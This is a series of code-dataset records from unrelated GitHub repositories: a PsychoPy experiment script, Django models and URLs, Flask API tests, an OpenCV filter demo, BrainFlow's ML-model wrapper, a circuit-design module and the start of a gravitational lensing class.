target_onset(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par,cues)\n #print(np.diff(trial_par[\"onset_vbl\"]))\n #print(trial_par[\"onset_vbl\"][0]-trial_par[\"ready_vbl\"][-1])\n \n if trial_par[\"jumped_gun\"] == 0:\n cursor,trial_par = 
fore_period(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par)\n #print(np.diff(trial_par[\"fore_vbl\"]))\n #print(trial_par[\"fore_vbl\"][0]-trial_par[\"onset_vbl\"][-1])\n \n if trial_par[\"jumped_gun\"] == 0:\n cursor,trial_par = reach_phase(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par)\n #print(np.diff(trial_par[\"reach_vbl\"]))\n #print(trial_par[\"reach_vbl\"][0]-trial_par[\"fore_vbl\"][-1])\n \n cursor,trial_par = feedback_phase(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par,feedback,bonus)\n #print(np.diff(trial_par[\"feedb_vbl\"]))\n #print(trial_par[\"feedb_vbl\"][0]-trial_par[\"reach_vbl\"][-1])\n \n trial_pars.append(trial_par)\n\ntrial_pars.append(par)\ntrial_pars.append(vis_par)\n\nimport pickle\nfile_out=\"Data/\"+expInfo[\"Participant\"]+'_Session'+expInfo[\"Session\"]+\"_\"+expInfo[\"Date\"]\nwith open(file_out,\"wb\") as fp:\n pickle.dump(trial_pars, fp)\n\nif expInfo[\"Session\"]=='4':\n bonus_screen(win,par,vis_par,core,visual,np,event,expInfo,imgComponents,cursor)\n\n#local_edf='/Users/asap1/Desktop/IV_task_fMRI/eyeData/'+edf_file\n#el_tracker.receiveDataFile(edf_file, local_edf)\n#el_tracker.closeDataFile()\n#el_tracker.stopRecording()\n#el_tracker.close()\n","repo_name":"dundonnm/incentivized-vigor-task","sub_path":"task_code/IV_task.py","file_name":"IV_task.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72095975399","text":"# -*- coding: utf-8 -*-\n\nfrom typing import Dict, Any\n\nimport os\nimport pkg_resources\n\nfrom bag.design import Module\n\n\nyaml_file = pkg_resources.resource_filename(__name__, os.path.join('netlist_info',\n 'inv_chain.yaml'))\n\n\n# noinspection PyPep8Naming\nclass bag_digital_ec__inv_chain(Module):\n \"\"\"Module for library bag_digital_ec cell inv_chain.\n\n Fill in high level description here.\n \"\"\"\n\n def __init__(self, bag_config, parent=None, prj=None, 
**kwargs):\n Module.__init__(self, bag_config, yaml_file, parent=parent, prj=prj, **kwargs)\n\n @classmethod\n def get_params_info(cls):\n # type: () -> Dict[str, str]\n return dict(\n lch='channel length.',\n wp_list='PMOS widths.',\n wn_list='NMOS widths.',\n thp='PMOS threshold.',\n thn='NMOS threshold.',\n segp_list='PMOS segments.',\n segn_list='NMOS segments.',\n stack_list='list of stack parameters for each inverter.',\n dum_info='Dummy information data structure.',\n )\n\n @classmethod\n def get_default_param_values(cls):\n # type: () -> Dict[str, Any]\n return dict(\n stack_list=None,\n dum_info=None,\n )\n\n def get_master_basename(self):\n segn_list = self.params['segn_list']\n return 'inv_chain_n%d_%dx' % (len(segn_list), segn_list[-1])\n\n def design(self, lch, wp_list, wn_list, thp, thn, segp_list, segn_list, stack_list, dum_info):\n ninv = len(wp_list)\n if not stack_list:\n stack_list = [False] * ninv\n name_list, term_list = [], []\n for idx in range(ninv):\n name_list.append('XINV%d' % idx)\n if idx == 0:\n in_name = 'in'\n else:\n in_name = 'mid<%d>' % (idx - 1)\n if idx == ninv - 1:\n out_name = 'out'\n else:\n out_name = 'mid<%d>' % idx\n term_list.append({'in': in_name, 'out': out_name})\n\n self.array_instance('XINV', name_list, term_list=term_list)\n for idx, (wp, wn, segp, segn, stack) in enumerate(zip(wp_list, wn_list, segp_list,\n segn_list, stack_list)):\n self.instances['XINV'][idx].design(lch=lch, wp=wp, wn=wn, thp=thp, thn=thn,\n segp=segp, segn=segn, stack=stack)\n\n self.design_dummy_transistors(dum_info, 'XDUM', 'VDD', 'VSS')\n","repo_name":"xyabc/bag_digital_ec","sub_path":"BagModules/bag_digital_ec/inv_chain.py","file_name":"inv_chain.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7074619745","text":"from django.db import models\nfrom datetime import datetime\nfrom manage import 
init_django\n\ninit_django()\n\nMONTH_CHOICES = (\n (1, \"January\"), (2, \"February\"),\n (3, \"March\"), (4, \"April\"),\n (5, \"May\"), (6, \"June\"),\n (7, \"July\"), (8, \"August\"),\n (9, \"September\"), (10, \"October\"),\n (11, \"November\"), (12, \"Decemberry\")\n )\n\nclass Accrual(models.Model):\n date = models.DateTimeField()\n month = models.PositiveSmallIntegerField(null=True, choices=MONTH_CHOICES)\n \n def save(self, *args, **kwargs):\n # достали месяц из даты\n self.month = datetime.strptime(self.date, \"%Y-%m-%d\").month\n super(Accrual, self).save(*args, **kwargs)\n \n\nclass Payment(models.Model):\n # связь один к одному из условий задачи\n accrual = models.OneToOneField(Accrual, null=True, on_delete=models.SET_NULL, related_name='payment')\n\n date = models.DateTimeField()\n month = models.PositiveSmallIntegerField(null=True, choices=MONTH_CHOICES)\n\n def save(self, *args, **kwargs):\n # месяц из даты\n self.month = datetime.strptime(self.date, \"%Y-%m-%d\").month\n\n try:\n\n # опущено условие про месяц, \n # потому что условий про самый старый включает месяц\n # 1 - фильтруем по неоплаченным счетам\n # 2 - фильтруем по прошедшей дате\n # 3 - сортируем по дате\n # 4 - берём первое\n self.accrual = Accrual.objects.filter(payment=None, date__lte = self.date).order_by('date').last()\n super(Payment, self).save()\n \n except Exception as e:\n # если возникло исключение оставляем пустым\n self.accrual = None\n super(Payment, self).save()\n \n","repo_name":"Alexander671/test_unified_information_system","sub_path":"task2/accrual/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10143616434","text":"\"\"\"movie_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. 
Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import patterns, include, url\n#from django.contrib import admin\nfrom django.contrib import admin\nfrom MovieLib import views\nfrom MovieLib.views import *\n\nfrom django.contrib.auth.views import login, logout\n\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'movie_project.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^chinna/', include(admin.site.urls)),\n #url(r'^movie_list/$', views.ListView.as_view(), name='movie_index'),\n #url(r'^$', 'MovieLib.views.index'),\n url(r'^$', include('MovieLib.urls', namespace=\"MovieLib\")), #index method inside /MovieLib/views.py will handle the `/` request \n \n #url(r'^create/$', 'MovieLib.views.Create', name='movie_create'),\n url(r'^index/$', views.ListView.as_view(), name='movie_index'),\n\n url(r'^create/$', views.CreateView.as_view(), name='movie_create'), \n url(r'^home/$', views.IndexView.as_view(), name='movie_home'),\n url(r'^movie_list/$', views.ListView.as_view(), name='movie_list'),\n url(r'^edit/(?P\\d+)$', views.UpdateView.as_view(), name='movie_edit'),\n url(r'^delete/(?P\\d+)$', views.DeleteView.as_view(), name='movie_delete'),\n\n url(r'^about_us/$', 'MovieLib.views.about', name='movie_about'),\n url(r'^contact/$', 'MovieLib.views.contact', name='movie_contact'),\n # url(r'^index/$', 'MovieLib.views.logout', name='movie_logout'),\n url(r'^logout/$', 'MovieLib.views.logout', name='movie_logout'),\n url(r'^base_page/$', 'MovieLib.views.base', name='movie_base'),\n #url(r'^movie_list/$', 'MovieLib.views.cancel', name='movie_cancel'),\n \n 
#url(r'^login/$', 'MovieLib.views.login', name='movie_login'),\n \n # url(r'^$', 'django.contrib.auth.views.login'),\n url(r'^logout/$', 'MovieLib.views.logout', name='movie_logout'),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login'), # If user is not login it will redirect to login page\n url(r'^login/$', 'MovieLib.views.login', name='movie_login'),\n\n url(r'^register/$', 'MovieLib.views.register', name='movie_register'),\n url(r'^register/success/$','MovieLib.views.register_success', name='movie_register'),\n\n \n\n\n)\n\n","repo_name":"chinnag0011/sample","sub_path":"movie_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22492491766","text":"import easyProve as ep\nimport fact\n\nA = ep.point('A')\nB = ep.point('B')\nC = ep.point('C')\nABC = ep.triangle('ABC', A, B, C)\n\nB_ = ep.point(\"B'\")\nC_ = ep.point(\"C'\")\n\nangle_BAB_= ep.angle(\"BAB'\", B, A, B_)\nangle_CAC_= ep.angle(\"CAC'\", C, A, C_)\n\nep.addRule(fact.AddEq(180, angle_BAB_, angle_CAC_))\nD = ep.point('D')\nep.addRule(fact.IsMidPoint(D, B_, C_))\n\nAD = ep.lineSeg('AD', A, D)\nBC = ep.lineSeg('BC', B, C)\n\nep.infer()\nep.ask(fact.DivEq(ep.what, AD, BC))\n","repo_name":"sg-first/easyProve","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14679284711","text":"# Importamos las librerias\r\nimport cv2\r\nimport numpy as np\r\n\r\n# Modos de ejecucion\r\n#vc = 0 --> 48 # Captura de video\r\n#fd = 1 --> 49 # Filtro desenfoque\r\n#fe = 2 --> 50 # Filtro detector de esquinas\r\n#fb = 3 --> 51 # Filtro de Bordes\r\n\r\n\r\n# Parametros para detector de esquinas\r\nesquinas_param = dict(maxCorners = 500, # Maximo numero de esquinas a detectar\r\n qualityLevel = 0.2, # Umbral minimo para la deteccion de 
esquinas\r\n minDistance = 15, # Distacia entre pixeles\r\n blockSize = 9) # Area de pixeles\r\n\r\n# Modo\r\nmood = 48\r\n\r\n# Creamos la Video Captura\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Creamos un ciclo para ejecutar nuestros Frames\r\nwhile True:\r\n # Leemos los fotogramas\r\n ret, frame = cap.read()\r\n\r\n # Decidimos el mood\r\n # Normal\r\n if mood == 48:\r\n # Mostramos los frames\r\n resultado = frame\r\n\r\n # Desenfoque\r\n elif mood == 49:\r\n # Modificamos frames\r\n resultado = cv2.blur(frame, (13, 13))\r\n\r\n # Bordes\r\n elif mood == 51:\r\n # Modificamos frames\r\n resultado = cv2.Canny(frame, 135, 150) # Umbral superior y umbral inferior\r\n\r\n # Esquinas\r\n elif mood == 50:\r\n # Obtenemos los frames\r\n resultado = frame\r\n # Conversion a escala de grises\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n # Calculamos las caracteristicas de las esquinas\r\n esquinas = cv2.goodFeaturesToTrack(gray, **esquinas_param)\r\n\r\n # Preguntamos si detectamos esquinas con esas caracteristicas\r\n if esquinas is not None:\r\n # Iteramos\r\n for x, y in np.float32(esquinas).reshape(-1,2):\r\n # Convertimos en enteros\r\n x,y = int(x), int(y)\r\n # Dibujamos la ubicacion de las esquinas\r\n cv2.circle(resultado, (x,y), 10, (255,0,0), 1)\r\n\r\n # Si presionamos otra tecla\r\n elif mood != 48 or mood != 49 or mood != 50 or mood != 51 or mood != -1:\r\n # No hacemos nada\r\n resultado = frame\r\n\r\n # Imprimimos mensaje\r\n print('TECLA INCORRECTA')\r\n\r\n\r\n # Mostramos los Frames\r\n cv2.imshow(\"VIDEO CAPTURA\", resultado)\r\n\r\n # Cerramos con lectura de teclado\r\n t = cv2.waitKey(1)\r\n # Salimos\r\n if t == 27:\r\n break\r\n # Modificamos Mood\r\n elif t != -1:\r\n mood = t\r\n\r\n# Liberamos la VideoCaptura\r\ncap.release()\r\n# Cerramos la 
ventana\r\ncv2.destroyAllWindows()\r\n","repo_name":"AprendeIngenia/Tecnicas-de-Procesamiento-en-Tiempo-real","sub_path":"ProcesamientoRT.py","file_name":"ProcesamientoRT.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"es","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"71082361732","text":"#!/usr/bin/env python3\n\nimport sys\n\nelfPacks = []\ncurrPack = 0\n\nfor line in sys.stdin:\n line = line.strip()\n if line == \"\":\n elfPacks.append(currPack)\n currPack = 0\n else:\n currPack += int(line)\n\nif currPack != 0:\n elfPacks.append(currPack)\n\nelfPacks.sort()\n\nprint(\"The largest pack is: {}\".format(elfPacks[len(elfPacks) - 1]))\n\ntopCount = 3\ntotal = 0\n\nfor _, val in enumerate(elfPacks[len(elfPacks) - topCount:]):\n total += val\n\nprint(\"The top {#010d} elves have a total of {}\".format(topCount, total))\n","repo_name":"RileyRaschke/adventofcode","sub_path":"2022/d01/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42189861422","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n #Executed before each test\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n \n #setting up secrets from virtual environment\n self.database_user = os.getenv(\"DB_USER\")\n self.database_password = os.getenv(\"DB_PASSWORD\")\n self.database_path = 'postgresql://{}:{}@{}/{}'.format(self.database_user, self.database_password, 'localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n\n # sample question for use in 
tests\n self.new_question = {\n \"answer\": \"Repunzul\", \n \"category\": 4, \n \"difficulty\": 2, \n \"question\": \"Which disney character has the longest hair?\"\n }\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n \"\"\"\n TODO\n Write at least one test for each test for successful operation and for expected errors.\n \"\"\" \n #---------- GET Categories ----------\n # Success\n def test_get_categories(self):\n #condition\n res = self.client().get(\"/categories\")\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[\"success\"], True)\n self.assertTrue(data[\"categories\"])\n self.assertTrue(data[\"total_categories\"])\n # Fail\n def test_error_404_get_categories(self):\n #condition\n res = self.client().patch('/categories/1')\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['error'], 404)\n self.assertEqual(data['message'], \"Not found\")\n self.assertEqual(data['success'], False)\n\n #---------- GET Questions (paginated) ----------\n # Success\n def test_get_questions_paginated(self):\n #condtion\n res = self.client().get('/questions')\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertTrue(len(data['questions']))\n\n # Fail\n def test_404_request_beyond_valid_page(self):\n #condition \n res = self.client().get('/questions?page=90') #if out of range\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Not found')\n \n 
#---------- DELETE Questions ----------\n # Success\n \n def test_delete_question(self):\n #condtion\n res = self.client().delete(\"/questions/17\")\n data = json.loads(res.data)\n #return question from database\n question = Question.query.filter(Question.id == 17).one_or_none()\n \n # check status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[\"success\"], True)\n self.assertEqual(data[\"deleted\"], 17)\n self.assertTrue(data[\"total_questions\"])\n self.assertTrue(len(data[\"questions\"]))\n self.assertEqual(question, None)\n \n # Fail\n def test_422_if_question_does_not_exist(self):\n # Success\n res = self.client().delete(\"/questions/90\")\n data = json.loads(res.data)\n \n # check status code and message\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data[\"success\"], False)\n self.assertEqual(data[\"message\"], \"unprocessable\")\n \n #---------- POST new Question ----------\n # Success\n def test_create_new_question(self):\n #condition\n res = self.client().post(\"/questions\", json=self.new_question)\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[\"success\"], True)\n self.assertTrue(data[\"created\"])\n self.assertTrue(data[\"question_created\"])\n self.assertTrue(len(data[\"questions\"]))\n \n # Fail\n def test_404_if_question_creation_not_valid(self):\n res = self.client().post(\"/books/45\", json={\"answer\": \"Repunzul\"})\n #incomplete fields\n data = json.loads(res.data)\n\n # check status code and message\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data[\"success\"], False)\n self.assertEqual(data[\"message\"], \"Not found\") \n\n \n #---------- POST search Question ----------\n # Success\n def test_search_questions(self):\n # send post request with search term\n res = self.client().post('/questions',\n json={'searchTerm': 'title'})\n # conditions\n data = json.loads(res.data)\n 
self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n\n # check if one of correct matches is included in response\n self.assertEqual(data['questions'][0]['id'], 5)\n \n # Fail\n def test_404_if_search_questions_fails(self):\n response = self.client().post('/questions',\n json={'searchTerm': ''})\n\n #condition\n data = json.loads(response.data)\n\n # check response\n self.assertEqual(response.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Not found')\n\n \n #---------- GET Questions (based on category) ----------\n # Success \n def test_get_questions_by_category(self):\n #condition\n res = self.client().get('/categories/2/questions') #for category id=2 \n data = json.loads(res.data)\n\n # response status code and message\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertNotEqual(len(data['questions']), 0)\n \n # Fail\n def test_400_if_questions_by_category_fails(self):\n #condition\n res = self.client().get('/categories/10/questions') #Category out of range 1-6\n data = json.loads(res.data)\n\n # response status code and message\n self.assertEqual(res.status_code, 400)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'bad request')\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"HafseeMan/Trivia-project","sub_path":"backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":7081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72578005253","text":"import ctypes\nimport enum\nimport json\nimport os\nimport platform\nimport struct\nfrom typing import List\n\nimport numpy\nimport pkg_resources\nfrom brainflow.board_shim import BrainFlowError, LogLevels\nfrom brainflow.exit_codes import BrainFlowExitCodes\nfrom nptyping import NDArray\nfrom numpy.ctypeslib import 
ndpointer\n\n\nclass BrainFlowMetrics(enum.IntEnum):\n \"\"\"Enum to store all supported metrics\"\"\"\n\n MINDFULNESS = 0 #:\n RESTFULNESS = 1 #:\n USER_DEFINED = 2 #:\n\n\nclass BrainFlowClassifiers(enum.IntEnum):\n \"\"\"Enum to store all supported classifiers\"\"\"\n\n DEFAULT_CLASSIFIER = 0 #:\n DYN_LIB_CLASSIFIER = 1 #:\n ONNX_CLASSIFIER = 2 #:\n\n\nclass BrainFlowModelParams(object):\n \"\"\" inputs parameters for prepare_session method\n\n :param metric: metric to calculate\n :type metric: int\n :param classifier: classifier to use\n :type classifier: int\n :param file: file to load model\n :type file: str\n :param other_info: additional information\n :type other_info: str\n :param output_name: output node name\n :type output_name: str\n :param max_array_size: max array size to preallocate\n :type max_array_size: int\n \"\"\"\n\n def __init__(self, metric, classifier) -> None:\n self.metric = metric\n self.classifier = classifier\n self.file = ''\n self.other_info = ''\n self.output_name = ''\n self.max_array_size = 8192\n\n def to_json(self) -> None:\n return json.dumps(self, default=lambda o: o.__dict__,\n sort_keys=True, indent=4)\n\n\nclass MLModuleDLL(object):\n __instance = None\n\n @classmethod\n def get_instance(cls):\n if cls.__instance is None:\n cls.__instance = cls()\n return cls.__instance\n\n def __init__(self):\n if platform.system() == 'Windows':\n if struct.calcsize(\"P\") * 8 == 64:\n dll_path = 'lib\\\\MLModule.dll'\n else:\n dll_path = 'lib\\\\MLModule32.dll'\n elif platform.system() == 'Darwin':\n dll_path = 'lib/libMLModule.dylib'\n else:\n dll_path = 'lib/libMLModule.so'\n full_path = pkg_resources.resource_filename(__name__, dll_path)\n if os.path.isfile(full_path):\n # for python we load dll by direct path but this dll may depend on other dlls and they will not be found!\n # to solve it we can load all of them before loading the main one or change PATH\\LD_LIBRARY_PATH env var.\n # env variable looks better, since it can be done 
only once for all dependencies\n dir_path = os.path.abspath(os.path.dirname(full_path))\n try:\n os.add_dll_directory(dir_path)\n except:\n pass\n if platform.system() == 'Windows':\n os.environ['PATH'] = dir_path + os.pathsep + os.environ.get('PATH', '')\n else:\n os.environ['LD_LIBRARY_PATH'] = dir_path + os.pathsep + os.environ.get('LD_LIBRARY_PATH', '')\n self.lib = ctypes.cdll.LoadLibrary(full_path)\n else:\n raise FileNotFoundError(\n 'Dynamic library %s is missed, did you forget to compile brainflow before installation of python package?' % full_path)\n\n self.set_log_level_ml_module = self.lib.set_log_level_ml_module\n self.set_log_level_ml_module.restype = ctypes.c_int\n self.set_log_level_ml_module.argtypes = [\n ctypes.c_int\n ]\n\n self.set_log_file_ml_module = self.lib.set_log_file_ml_module\n self.set_log_file_ml_module.restype = ctypes.c_int\n self.set_log_file_ml_module.argtypes = [\n ctypes.c_char_p\n ]\n\n self.log_message_ml_module = self.lib.log_message_ml_module\n self.log_message_ml_module.restype = ctypes.c_int\n self.log_message_ml_module.argtypes = [\n ctypes.c_int,\n ctypes.c_char_p\n ]\n\n self.prepare = self.lib.prepare\n self.prepare.restype = ctypes.c_int\n self.prepare.argtypes = [\n ctypes.c_char_p\n ]\n\n self.release = self.lib.release\n self.release.restype = ctypes.c_int\n self.release.argtypes = [\n ctypes.c_char_p\n ]\n\n self.release_all = self.lib.release_all\n self.release_all.restype = ctypes.c_int\n self.release_all.argtypes = []\n\n self.predict = self.lib.predict\n self.predict.restype = ctypes.c_int\n self.predict.argtypes = [\n ndpointer(ctypes.c_double),\n ctypes.c_int,\n ndpointer(ctypes.c_double),\n ndpointer(ctypes.c_int32),\n ctypes.c_char_p\n ]\n\n self.get_version_ml_module = self.lib.get_version_ml_module\n self.get_version_ml_module.restype = ctypes.c_int\n self.get_version_ml_module.argtypes = [\n ndpointer(ctypes.c_ubyte),\n ndpointer(ctypes.c_int32),\n ctypes.c_int\n ]\n\n\nclass MLModel(object):\n 
\"\"\"MLModel class used to calc derivative metrics from raw data\n\n :param model_params: Model Params\n :type model_params: BrainFlowModelParams\n \"\"\"\n\n def __init__(self, model_params: BrainFlowModelParams) -> None:\n self.model_params = model_params\n try:\n self.serialized_params = model_params.to_json().encode()\n except BaseException:\n self.serialized_params = model_params.to_json()\n\n @classmethod\n def set_log_level(cls, log_level: int) -> None:\n \"\"\"set BrainFlow log level, use it only if you want to write your own messages to BrainFlow logger,\n otherwise use enable_ml_logger, enable_dev_ml_logger or disable_ml_logger\n\n :param log_level: log level, to specify it you should use values from LogLevels enum\n :type log_level: int\n \"\"\"\n res = MLModuleDLL.get_instance().set_log_level_ml_module(log_level)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to enable logger', res)\n\n @classmethod\n def enable_ml_logger(cls) -> None:\n \"\"\"enable ML Logger with level INFO, uses stderr for log messages by default\"\"\"\n cls.set_log_level(LogLevels.LEVEL_INFO.value)\n\n @classmethod\n def disable_ml_logger(cls) -> None:\n \"\"\"disable BrainFlow Logger\"\"\"\n cls.set_log_level(LogLevels.LEVEL_OFF.value)\n\n @classmethod\n def enable_dev_ml_logger(cls) -> None:\n \"\"\"enable ML Logger with level TRACE, uses stderr for log messages by default\"\"\"\n cls.set_log_level(LogLevels.LEVEL_TRACE.value)\n\n @classmethod\n def set_log_file(cls, log_file: str) -> None:\n \"\"\"redirect logger from stderr to file, can be called any time\n\n :param log_file: log file name\n :type log_file: str\n \"\"\"\n try:\n file = log_file.encode()\n except BaseException:\n file = log_file\n res = MLModuleDLL.get_instance().set_log_file_ml_module(file)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to redirect logs to a file', res)\n\n @classmethod\n def log_message(cls, log_level: int, message: str) -> 
None:\n \"\"\"write your own log message to BrainFlow logger, use it if you wanna have single logger for your own code and BrainFlow's code\n\n :param log_level: log level\n :type log_file: int\n :param message: message\n :type message: str\n \"\"\"\n try:\n msg = message.encode()\n except BaseException:\n msg = message\n res = MLModuleDLL.get_instance().log_message_ml_module(log_level, msg)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to write log message', res)\n\n @classmethod\n def release_all(cls) -> None:\n \"\"\"release all classifiers\"\"\"\n\n res = MLModuleDLL.get_instance().release_all()\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to release classifiers', res)\n\n @classmethod\n def get_version(cls) -> str:\n \"\"\"get version of brainflow libraries\n\n :return: version\n :rtype: str\n :raises BrainFlowError\n \"\"\"\n string = numpy.zeros(64).astype(numpy.ubyte)\n string_len = numpy.zeros(1).astype(numpy.int32)\n res = MLModuleDLL.get_instance().get_version_ml_module(string, string_len, 64)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to request info', res)\n return string.tobytes().decode('utf-8')[0:string_len[0]]\n\n def prepare(self) -> None:\n \"\"\"prepare classifier\"\"\"\n\n res = MLModuleDLL.get_instance().prepare(self.serialized_params)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to prepare classifier', res)\n\n def release(self) -> None:\n \"\"\"release classifier\"\"\"\n\n res = MLModuleDLL.get_instance().release(self.serialized_params)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to release classifier', res)\n\n def predict(self, data: NDArray) -> List:\n \"\"\"calculate metric from data\n\n :param data: input array\n :type data: NDArray\n :return: metric value\n :rtype: List\n \"\"\"\n output = numpy.zeros(self.model_params.max_array_size).astype(numpy.float64)\n 
output_len = numpy.zeros(1).astype(numpy.int32)\n res = MLModuleDLL.get_instance().predict(data, data.shape[0], output, output_len, self.serialized_params)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to calc metric', res)\n return output[0:output_len[0]]\n","repo_name":"brainflow-dev/brainflow","sub_path":"python_package/brainflow/ml_model.py","file_name":"ml_model.py","file_ext":"py","file_size_in_byte":9740,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"44"} +{"seq_id":"3560796989","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\n# Create your models here.\nclass CustomUser(AbstractUser):\n is_student = models.BooleanField(default=False)\n is_candidate = models.BooleanField(default=False)\n\n username = None\n email = models.EmailField('email address', unique=True)\n\n name = models.CharField(max_length=50)\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = ['name',]\n\nclass University(models.Model):\n\n class UniversityName(models.TextChoices):\n POLITECHNIKA_WROCLAW = 'PWR', 'Politechnika Wrocławska'\n POLITECHNIKA_WARSZAWA = 'PW', 'Politechnika Warszawska'\n POLITECHNIKA_SZCZECIN = 'ZUT', 'Zachodniopomorski Uniwersytet Technologiczny'\n\n class City(models.TextChoices):\n WARSZAWA = 'WAW', 'Warszawa'\n SZCZECIN = 'SZN', 'Szczecin'\n WROCLAW = 'WRO', 'Wrocław'\n\n name = models.CharField(max_length = 50)\n\n city = models.CharField(max_length = 20)\n\n description = models.TextField()\n\n def __str__(self):\n return self.name\n\nclass Student(models.Model):\n user = models.OneToOneField(CustomUser, on_delete=models.CASCADE, primary_key=True)\n university = models.ForeignKey(University, on_delete=models.PROTECT, null=True)\n\nclass Question(models.Model):\n class Category(models.TextChoices):\n REKRUTACJA = 'REK', 'Rekrutacja'\n INNE = 'INN', 'Inne' \n\n askedBy = models.ForeignKey(CustomUser, on_delete=models.SET_NULL, 
related_name='asked_questions', null=True)\n text = models.CharField(max_length=100)\n category = models.CharField(\n max_length=3,\n choices=Category.choices,\n default=Category.REKRUTACJA\n )\n createdAt = models.DateTimeField(auto_now_add=True)\n universities = models.ManyToManyField(University)\n price = models.FloatField(default=0.4)","repo_name":"LukaszKe/UniversityWithQuestions","sub_path":"system/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7862402887","text":"from lenstronomy.LensModel.lens_model import LensModel\nimport numpy as np\n\n\nclass MultiPlaneLensing(object):\n\n _no_potential = True\n\n def __init__(self, full_lensmodel, x_pos, y_pos, lensmodel_params, z_source,\n z_macro, astropy_instance, macro_indicies, optimizer_kwargs, numerical_alpha_class,\n observed_convention_index=None):\n\n \"\"\"\n This class performs (fast) lensing computations for multi-plane lensing scenarios\n :param full_lensmodel:\n :param x_pos:\n :param y_pos:\n :param lensmodel_params:\n :param z_source:\n :param z_macro:\n :param astropy_instance:\n :param macro_indicies:\n \"\"\"\n\n self._z_macro, self._z_source = z_macro, z_source\n\n self._astropy_instance = astropy_instance\n\n self._x_pos, self._y_pos = np.array(x_pos), np.array(y_pos)\n self._nimg = len(x_pos)\n self._mag_idx = 0\n\n self._full_lensmodel, self._lensmodel_params = full_lensmodel, lensmodel_params\n\n self._T_z_source = 